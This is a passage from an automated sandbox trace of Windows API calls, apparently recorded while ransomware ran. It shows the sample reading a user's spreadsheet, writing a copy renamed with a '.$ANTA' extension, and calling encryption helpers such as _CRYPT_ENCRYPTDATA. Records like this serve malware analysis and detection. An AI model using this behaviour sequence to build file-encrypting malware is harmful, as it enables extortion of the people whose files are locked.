lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0079.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0079.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0079.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0079.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0079.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0079.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0079.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0079.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0079.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0079.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0079.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0079.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0079.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0079.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0079.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0079.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0079.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0079.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0079.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0079.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0079.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0079.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0079.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0079.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0079.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4590 [0079.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0079.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0079.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0079.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0079.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4590 | out: hHeap=0x1780000) returned 1 [0079.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0079.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0079.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0079.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0079.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0079.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0079.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0079.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0079.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369fd8 [0079.414] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg")) returned 0x10 [0079.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369fd8 | out: hHeap=0x1780000) returned 1 [0079.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0079.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0079.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0079.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0079.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43fb3b0 [0079.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0079.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0079.414] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\IVMtcxmHJDptt31P9OCD.xls.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\ivmtcxmhjdptt31p9ocd.xls.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0079.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0079.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0079.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0079.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0079.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0079.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0079.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0079.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0079.415] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0079.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0079.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0079.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0079.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0079.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0079.416] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0079.416] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0079.416] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0079.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0079.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0079.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0079.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0079.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0079.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0079.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0079.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0079.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0079.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0079.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0079.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0079.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0079.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e05020 [0079.420] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0079.420] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ecd0*=0x10000, lpOverlapped=0x0) returned 1 [0079.440] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ecd0*=0x2f5a, lpOverlapped=0x0) returned 1 [0079.440] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0079.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0079.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0079.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0079.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x12f5a) returned 0x499a008 [0079.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e05020 | out: hHeap=0x1780000) returned 1 [0079.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0079.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0079.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0079.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0079.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0079.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x12f5a) returned 0x49acf70 [0079.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0079.444] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0079.444] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0079.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0079.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0079.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0079.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0079.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x12f5a) returned 0x499a008 [0079.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0079.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0079.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0079.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0079.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0079.445] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0079.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0079.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0079.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0079.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0079.445] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0079.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0079.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0079.445] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0079.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0079.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0079.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2530 [0079.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0079.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0079.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0079.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0079.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x12f5a) returned 0x499a008 [0079.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2570 [0079.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0079.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0079.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0079.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2580 [0079.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0079.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0079.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2590 [0079.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0079.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0079.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9e8 [0079.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0079.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0079.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0079.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0079.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0079.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x12f5a) returned 0x49bfed8 [0079.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0079.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0079.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0079.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0079.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0079.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0079.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0079.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0079.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0079.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0079.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0079.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0079.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0079.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0079.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0079.448] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0079.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0079.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0079.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0079.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0079.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0079.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0079.448] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0079.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0079.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0079.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0079.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0079.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0079.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0079.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0079.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0079.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0079.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0079.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0079.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0079.448] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0079.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0079.448] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ea8 | out: hHeap=0x1780000) returned 1 [0079.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0079.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0079.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0079.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0079.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0079.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0079.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0079.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0079.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0079.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0079.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0079.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0079.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0079.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0079.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0079.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0079.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0079.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0079.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0079.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0079.449] HeapFree (in: 